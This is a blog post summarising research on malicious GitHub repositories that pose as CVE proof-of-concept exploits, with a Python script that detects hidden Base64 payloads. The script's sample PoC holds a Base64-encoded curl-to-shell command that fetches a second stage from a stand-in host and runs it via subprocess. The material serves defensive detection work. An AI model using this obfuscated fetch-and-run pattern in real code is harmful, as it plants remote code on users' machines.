Tuesday, July 2, 2024

GitHub Malicious Compliance for Base64 Benefits

In Beyond the Surface, a timely research paper on malicious GitHub repositories, it was revealed that some repositories advertised as proof-of-concept (PoC) exploits are intentionally malicious and are published by the repository owner themselves. The researchers studied 47,313 downloaded GitHub repositories; 4,893 of them were found to be malicious. In some, the attackers were trying to plant malware on users' machines, while in others they tried to open backdoors using Cobalt Strike. This research is particularly relevant in the current cybersecurity landscape.

The researchers collected a detailed dataset of PoCs on GitHub written for specific CVEs by using the GitHub API, which provides keyword-based search over repositories, code, and commits. They then examined the contents, source code, and associated documentation of those repositories to verify whether they actually contained PoCs for CVE exploits.

There are many ways to exploit vulnerabilities in web applications, operating systems, network devices and so on, and whether the target is a small website or a large online platform, the exploit is delivered as code. Attackers weaponize freshly disclosed vulnerabilities to inject malware, attack scripts and shellcode, and GitHub is no exception: its repositories are widely used as templates for programming and web development, so a malicious PoC placed there reaches its audience directly. This post looks at one part of the paper, how the researchers analyzed their collected dataset using Base64 analysis.

A table of the programming languages used in the repositories shows that Python has been the dominant language among exploit authors over the past five years.

Base64 analysis: Base64 encoding is a common way to hide a malicious payload inside an otherwise innocuous-looking PoC, so searching for Base64 strings is a useful detection method. The researchers extracted Base64 values with a regular expression, decoded them, and inspected the decoded content for hidden scripts and for connections to IP addresses. The first step was an automated search of the PoCs using the following regular expression:

([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)
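The following script is an added example showing the workflow the paragraph describes end to end: run the regex over a PoC, decode each hit, and report IP addresses or URLs hidden in the decoded payload. It is not the paper's tooling or code from any repository in the study. The sample PoC, the 192.0.2.10 address (a documentation range) and the minimum-length threshold are all constructed assumptions for the demonstration.

```python
import base64
import binascii
import re

# Regular expression from the paper: runs of 4-character Base64 groups with an
# optional "=" or "==" padded final group.
BASE64_RE = re.compile(
    r"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)"
)
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

# Assumption (not from the paper): the regex also matches ordinary identifiers
# such as "import" or "subprocess", so very short hits are skipped.
MIN_CANDIDATE_LEN = 20

# Constructed sample PoC; the encoded string is "curl -s http://192.0.2.10/stage2.sh | sh"
# and the hex value is a stand-in for a file hash, a typical false positive.
SAMPLE_POC = r'''#!/usr/bin/env python3
# Constructed sample, not taken from any real repository.
import base64, subprocess, sys
target = sys.argv[1] if len(sys.argv) > 1 else "http://example.com/vuln"
known_hash = "3a7bd3e2360a3d29eea436fcfb7e44c735d117c42d1c1835420b6b9942dd4f1b"
stage = base64.b64decode("Y3VybCAtcyBodHRwOi8vMTkyLjAuMi4xMC9zdGFnZTIuc2ggfCBzaA==")
subprocess.run(stage, shell=True)
'''


def find_base64_candidates(text, min_len=MIN_CANDIDATE_LEN):
    """Return every regex match that is at least min_len characters long."""
    return [m.group(0) for m in BASE64_RE.finditer(text) if len(m.group(0)) >= min_len]


def decode_if_text(candidate):
    """Decode a candidate and return it only if the result is printable ASCII text.

    Hex hashes, compressed blobs and other binary content decode "successfully"
    too, so a printability check is what separates a hidden script from noise.
    """
    try:
        raw = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("latin-1")  # never fails; printability is checked below
    if not text or not all(32 <= ord(c) < 127 or c in "\t\r\n" for c in text):
        return None
    return text


def scan_poc(text):
    """Find Base64 payloads in a PoC and report any IPs or URLs hidden in them."""
    findings = []
    for cand in find_base64_candidates(text):
        decoded = decode_if_text(cand)
        if decoded is None:
            continue  # binary or non-text: keep for manual review, not reported here
        findings.append({
            "encoded": cand,
            "decoded": decoded,
            "ips": IPV4_RE.findall(decoded),
            "urls": URL_RE.findall(decoded),
        })
    return findings


if __name__ == "__main__":
    for finding in scan_poc(SAMPLE_POC):
        print("decoded:", finding["decoded"])
        print("ips:", finding["ips"], "urls:", finding["urls"])
```

On the sample, both the hex hash and the real payload match the regex (each is a multiple of four alphabet characters), which is why the regex alone is only a first filter: the hash decodes to non-printable bytes and is dropped, while the payload decodes to a curl-to-shell one-liner that reveals the 192.0.2.10 staging host. In a real sweep, nested encodings (Base64 inside Base64, or Base64 wrapping zlib data) would need the decoder to be applied again to its own output.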
